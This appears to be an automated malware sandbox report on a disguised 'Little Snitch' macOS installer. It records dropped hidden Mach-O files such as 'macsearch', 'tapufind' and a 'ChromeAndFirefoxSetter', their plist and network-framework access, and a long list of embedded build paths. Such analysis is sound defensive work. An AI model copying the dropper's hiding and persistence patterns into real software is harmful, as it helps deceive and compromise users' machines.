Source: /usr/bin/open (PID: 722)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /Users/henry/Library/Application Support/Agent/tapufind (PID: 713)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /System/Library/CoreServices/ReportCrash (PID: 724)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)Show sources
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plistJump to behavior
Source: /tmp/tapufind/ChromeAndFirefoxSetter (PID: 716)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plistJump to behavior
Source: /Users/henry/Library/Application Support/Agent/tapufind (PID: 713)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plistJump to behavior
Uses Security framework containing interfaces for system-level user authentication and authorizationShow sources
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702)Security framework info plist opened: /System/Library/Frameworks/Security.framework/Resources/Info.plistJump to behavior
Writes 64-bit Mach-O files to diskShow sources
Source: /usr/bin/ditto (PID: 673)File written: /private/tmp/macsearch.app/Contents/MacOS/.BC.T_5fp5ObJump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)File written: /private/tmp/tapufind/.dat.nosync02b9.o9GXrLJump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)File written: /Users/henry/Library/Application Support/Agent/tapufindJump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)File written: /private/tmp/tapufind/.dat.nosync02b9.raddFFJump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)File written: /private/tmp/tapufind/.dat.nosync02b9.DAOwrTJump to dropped file
Writes Mach-O files to the tmp directoryShow sources
Source: /usr/bin/ditto (PID: 673)64-bit Mach-O written to tmp path: /private/tmp/macsearch.app/Contents/MacOS/.BC.T_5fp5ObJump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)64-bit Mach-O written to tmp path: /private/tmp/tapufind/.dat.nosync02b9.o9GXrLJump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)64-bit Mach-O written to tmp path: /private/tmp/tapufind/.dat.nosync02b9.raddFFJump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)64-bit Mach-O written to tmp path: /private/tmp/tapufind/.dat.nosync02b9.DAOwrTJump to dropped file
Reads data from the local random generatorShow sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 674)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 678)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 693)Random device file read: /dev/urandomJump to behavior
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702)Random device file read: /dev/urandomJump to behavior
Sample contains user paths that might be useful for attributionShow sources
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/abcremoval.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/aot-compiler.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/aot-runtime.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/branch-opts.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/cfgdump.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/cfold.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/debug-mini.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/debugger-agent
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/decompose.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/dominators.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/driver.g.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/branch-opts.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/debugger-agent
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/driver.g.c--de
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/../../../mono-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/dwarfwriter.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/exceptions-amd
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/graph.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/helpers.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/image-writer.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/jit-icalls.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/linear-scan.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/liveness.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/lldb.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/local-propagat
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/method-to-ir.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/ir-emit.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini-amd64-gsh
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini-amd64.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini-codegen.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini-darwin.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini-exception
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini-generic-s
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini-native-ty
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini-posix.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini-runtime.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini-trampolin
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/class-inte
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/simd-intrinsic
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/ssa.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/tasklets.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/trace.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/tramp-amd64-gs
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/tramp-amd64.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/unwind.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/builds/install/mac64/lib
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/builds/install/mac64/etc
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/builds/install/mac64/bin/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/appdomain.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/assembly.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/attach.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/class.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/cominterop
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/console-un
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/custom-att
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/debug-help
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/debug-mono
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/debug-mono
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/decimal-ms
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/domain.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/dynamic-im
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/exception.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/file-mmap-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/gc.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/icall.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/icall.c:13
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/image.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/jit-info.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/loader.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/locales.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/marshal.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/metadata-v
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/metadata.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/method-bui
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/monitor.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/mono-basic
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/mono-debug
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/mono-debug
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/mono-hash.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/mono-mlist
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/mono-secur
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/number-ms.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/object.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/profiler.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/rand.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/reflection
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/remoting.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/runtime.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/seq-points
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-bridg
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-mono.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-new-b
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-dynar
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-old-b
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-scan-obje
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-os-ma
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-stw.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-tarja
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-toggl
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/socket-io.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sre-encode
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sre-save.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sre.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/string-ica
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/threadpool
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/threadpool
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/threadpool
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/threads.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/verify.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-alloc.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-array-lis
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-debug.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-descripto
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-fin-weak-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-gc.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-gchandles
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-gray.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-internal.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-los.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-marksweep
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-copy-obje
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-memory-go
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-nursery-a
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-pointer-q
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-protocol.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-split-nur
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-workers.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/error.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/events.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/io.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/mutexes.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/processes.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/semaphores
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/sockets.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/versioninf
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/wapi.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/hazard-pointe
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/json.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/lock-free-all
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/lock-free-arr
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/lock-free-que
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mach-support-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/memfuncs.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-codeman.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-conc-has
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-counters
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-dl.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-error.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-internal
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-linked-l
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-logger.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-mmap.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-rand.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-sha1.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-lazy-ini
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-tls.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/monobitset.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/networking-po
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/strenc.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/w32handle.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/garray.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gdate-unix.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gdir-unix.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gerror.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gfile-posix.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/ghashtable.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/giconv.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gmarkup.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gmisc-unix.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gpath.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gptrarray.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gshell.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gspawn.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gstr.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gstring.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/gtimer-unix.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/../../../mono-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/liveness.c!(cf
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/method-to-ir.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/ir-emit.hmono_
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini-trampolin
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini.cpos == f
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/trace.c!mono_m
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/unwind.cread32
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/assembly.c
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-os-ma
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sre.copt_p
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/threadpool
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-debug.c!m
